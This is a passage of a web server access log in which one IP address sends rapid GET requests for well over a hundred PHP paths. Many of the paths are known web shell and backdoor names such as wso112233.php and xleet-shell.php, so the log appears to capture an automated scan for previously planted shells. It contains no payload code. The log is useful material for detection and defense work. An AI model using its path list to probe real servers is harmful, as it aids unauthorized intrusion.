+0700] "GET /uploads/options.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.160.252 - - [15/Sep/2024:22:16:38 +0700] "GET /uploads/2022/themes.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" 146.70.160.252 - - [15/Sep/2024:22:16:38 +0700] "GET /includes/admin-all.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:38 +0700] "GET /bussubmit.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:39 +0700] "GET /network/class.api.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.160.252 - - [15/Sep/2024:22:16:39 +0700] "GET /css/dist/editor/fxp.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.160.252 - - [15/Sep/2024:22:16:39 +0700] "GET /themes/randkeyword.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 146.70.160.252 - - [15/Sep/2024:22:16:39 +0700] "GET /widgets/class-wp-admin.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:39 +0700] "GET /css/hm.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:40 +0700] "GET /maint/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0" 146.70.160.252 - - [15/Sep/2024:22:16:40 +0700] "GET /plugins/moon.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 146.70.160.252 - - [15/Sep/2024:22:16:40 +0700] "GET /block-supports/admin.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:40 +0700] "GET /uploads/2014/07/olx.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:41 +0700] "GET /css/moon.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:41 +0700] "GET /upgrade/fx.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:41 +0700] "GET /assets/text.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.160.252 - - [15/Sep/2024:22:16:41 +0700] "GET /widgets/autoload_classmap.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0" 146.70.160.252 - - [15/Sep/2024:22:16:41 +0700] "GET /joomla/css.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" 146.70.160.252 - - [15/Sep/2024:22:16:42 +0700] "GET /images/server.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:42 +0700] "GET /theme-compat/wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0" 146.70.160.252 - - [15/Sep/2024:22:16:42 +0700] "GET /classes/.secret/info.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0" 146.70.160.252 - - [15/Sep/2024:22:16:42 +0700] "GET /css/colors/coffee/xmrlpc.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.160.252 - - [15/Sep/2024:22:16:43 +0700] "GET /uploads/wp-conflg.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:43 +0700] "GET /IXR/themes-install.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0" 146.70.160.252 - - [15/Sep/2024:22:16:43 +0700] "GET /css/colors/content.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 146.70.160.252 - - [15/Sep/2024:22:16:43 +0700] "GET /network/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:43 +0700] "GET /maint/images.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 146.70.160.252 - - [15/Sep/2024:22:16:44 +0700] "GET /themes/autoload_classmap.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0" 146.70.160.252 - - [15/Sep/2024:22:16:44 +0700] "GET /css/colors/coffee/wp-casper.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0" 146.70.160.252 - - [15/Sep/2024:22:16:44 +0700] "GET /111.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:44 +0700] "GET /a2t1lr.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.160.252 - - [15/Sep/2024:22:16:44 +0700] "GET /css/colors/file.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:45 +0700] "GET /sodium_compat/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 146.70.160.252 - - [15/Sep/2024:22:16:45 +0700] "GET /cl.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:45 +0700] "GET /phpmailer/file.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:45 +0700] "GET /Text/Diff/Renderer/install.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 146.70.160.252 - - [15/Sep/2024:22:16:45 +0700] "GET /tclu0b.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:46 +0700] "GET /css/about.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 146.70.160.252 - - [15/Sep/2024:22:16:46 +0700] "GET /atomic/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:46 +0700] "GET /images/crystal/png.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0" 146.70.160.252 - - [15/Sep/2024:22:16:46 +0700] "GET /pki-validation/as.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:46 +0700] "GET /images/star.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.160.252 - - [15/Sep/2024:22:16:47 +0700] "GET /wp-log.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:47 +0700] "GET /cgi-bin/about.php7 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:47 +0700] "GET /languages/filemanager.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.160.252 - - [15/Sep/2024:22:16:47 +0700] "GET /css/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 146.70.160.252 - - [15/Sep/2024:22:16:47 +0700] "GET /themes/hello-element/footer.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 146.70.160.252 - - [15/Sep/2024:22:16:48 +0700] "GET /fonts/garbagecron_driver.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 146.70.160.252 - - [15/Sep/2024:22:16:48 +0700] "GET /plugins/work-list/lang.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.160.252 - - [15/Sep/2024:22:16:48 +0700] "GET /js/tinymce/wp-blog.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:48 +0700] "GET /plugins/wso112233.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:48 +0700] "GET /newsleter.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:49 +0700] "GET /plugins/ango/sett.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:49 +0700] "GET /themes/hideo/network.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:49 +0700] "GET /pki-validation/chosen.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.160.252 - - [15/Sep/2024:22:16:49 +0700] "GET /pki-validation/network.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:50 +0700] "GET /includes/iR7SzrsOUEP.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0" 146.70.160.252 - - [15/Sep/2024:22:16:50 +0700] "GET /includes/saAvep.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:50 +0700] "GET /css/themes.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:50 +0700] "GET /admin.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.160.252 - - [15/Sep/2024:22:16:51 +0700] "GET /images/class_api.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:51 +0700] "GET /plugins/fix/sv.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:51 +0700] "GET /ID3/about.php7 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:51 +0700] "GET /js/widgets/classwithtostring.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" 146.70.160.252 - - [15/Sep/2024:22:16:51 +0700] "GET /upload-size.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:52 +0700] "GET /pomo/bypass.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.160.252 - - [15/Sep/2024:22:16:52 +0700] "GET /customize/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 146.70.160.252 - - [15/Sep/2024:22:16:52 +0700] "GET /db.php?u HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:52 +0700] "GET /pki-validation/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:52 +0700] "GET /text.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0" 146.70.160.252 - - [15/Sep/2024:22:16:53 +0700] "GET /IXR/allez.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.160.252 - - [15/Sep/2024:22:16:53 +0700] "GET /includes/class.zip.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; rv:11.0) like Gecko" 146.70.160.252 - - [15/Sep/2024:22:16:53 +0700] "GET /images/1p.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 146.70.160.252 - - [15/Sep/2024:22:16:53 +0700] "GET /uploads/2015/05/Marvins.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.160.252 - - [15/Sep/2024:22:16:53 +0700] "GET /widgets/slsotot.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0" 146.70.160.252 - - [15/Sep/2024:22:16:54 +0700] "GET /views/form/tmpl/size.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0" 146.70.160.252 - - [15/Sep/2024:22:16:54 +0700] "GET /pki-validation/indexx.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 146.70.160.252 - - [15/Sep/2024:22:16:54 +0700] "GET /wp-class.php/wp-content/uploads/wp_live_chat/abruzi.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0" 146.70.160.252 - - [15/Sep/2024:22:16:54 +0700] "GET /filemanager.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.160.252 - - [15/Sep/2024:22:16:54 +0700] "GET /images/null.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0" 146.70.160.252 - - [15/Sep/2024:22:16:55 +0700] "GET /ucp.php/xmlrpc.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:55 +0700] "GET /includes/users.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 146.70.160.252 - - [15/Sep/2024:22:16:55 +0700] "GET /network/iR7SzrsOUEP.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:55 +0700] "GET /css/colors/blue/rafosul.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0" 146.70.160.252 - - [15/Sep/2024:22:16:56 +0700] "GET /expect.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.160.252 - - [15/Sep/2024:22:16:56 +0700] "GET /css/mar.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.160.252 - - [15/Sep/2024:22:16:56 +0700] "GET /js/widgets/iR7SzrsOUEP.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:56 +0700] "GET /includes/meta-boxes-git.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; rv:11.0) like Gecko" 146.70.160.252 - - [15/Sep/2024:22:16:56 +0700] "GET /plugins/Cache/Cache.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 146.70.160.252 - - [15/Sep/2024:22:16:57 +0700] "GET /Text/3xrx.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:57 +0700] "GET /user.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 146.70.160.252 - - [15/Sep/2024:22:16:57 +0700] "GET /assets/radio.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0" 146.70.160.252 - - [15/Sep/2024:22:16:57 +0700] "GET /plugins/WordPressCore/vod.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 146.70.160.252 - - [15/Sep/2024:22:16:57 +0700] "GET /rest-api/wrapper.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0" 146.70.160.252 - - [15/Sep/2024:22:16:58 +0700] "GET /pki-validation/themes.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 146.70.160.252 - - [15/Sep/2024:22:16:58 +0700] "GET /regions.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.160.252 - - [15/Sep/2024:22:16:58 +0700] "GET /maint/admin.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:58 +0700] "GET /csv_customers.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:59 +0700] "GET /uploads/rk2.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 146.70.160.252 - - [15/Sep/2024:22:16:59 +0700] "GET /network/xmrlpc.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:59 +0700] "GET /upgrade/wp-sigunq.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0" 146.70.160.252 - - [15/Sep/2024:22:16:59 +0700] "GET /images/moon.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:16:59 +0700] "GET /license.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:17:00 +0700] "GET /pack.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0" 146.70.160.252 - - [15/Sep/2024:22:17:00 +0700] "GET /css/dist/content.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:17:00 +0700] "GET /css/dist/block-library/about.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:17:00 +0700] "GET /IXR/bless.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:17:01 +0700] "GET /themes/alfakecil.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:17:01 +0700] "GET /user-template.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:17:01 +0700] "GET /Text/chosen.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 146.70.160.252 - - [15/Sep/2024:22:17:01 +0700] "GET /Text/Diff/Renderer/about.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" 146.70.160.252 - - [15/Sep/2024:22:17:01 +0700] "GET /xx.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.160.252 - - [15/Sep/2024:22:17:02 +0700] "GET /wp-content/plugins/wp-content/uploads/wp_live_chat/abruzi.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:17:02 +0700] "GET /find.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0" 146.70.160.252 - - [15/Sep/2024:22:17:02 +0700] "GET /xleet-shell.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0" 146.70.160.252 - - [15/Sep/2024:22:17:02 +0700] "GET /SimplePie/Canonical.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 146.70.160.252 - - [15/Sep/2024:22:17:02 +0700] "GET /css/colors/wp-admin.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 146.70.160.252 - - [15/Sep/2024:22:17:03 +0700] 